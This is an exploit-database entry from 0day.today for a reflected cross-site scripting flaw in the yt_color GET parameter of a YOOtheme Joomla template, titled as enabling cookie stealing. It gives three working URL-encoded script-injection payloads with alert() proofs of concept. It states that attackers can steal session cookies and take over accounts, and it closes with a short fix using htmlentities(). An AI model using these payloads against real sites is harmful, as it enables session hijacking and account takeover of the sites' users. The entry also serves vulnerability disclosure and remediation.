Joomla yt_color YOOOtheme XSS and Cookie Stealing

2009-12-04T00:00:00
ID 1337DAY-ID-10072
Type zdt
Reporter andresg
Modified 2009-12-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================
Joomla yt_color YOOOtheme XSS and Cookie Stealing 
=================================================

########################################################################
# The GET variable yt_color can be set to any script
########################################################################
# Example 1: index.php/inicio?yt_color=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E
# Example 2: index.php?option=com_content&task=view&id=13&Itemid=47&yt_color=%00'%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E
# Example 3: The GET variable yt_color can be set to "+onmouseover=alert(123456)+
########################################################################
# Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable
# application to fool a user in order to gather data from them. An attacker can steal the
# session cookie and take over the account.
########################################################################
# Solution:
# Use htmlentities() or htmlspecialchars() functions.
# Solution Example : $name=htmlentities($_GET['name'])
########################################################################



#  0day.today [2016-04-20]  #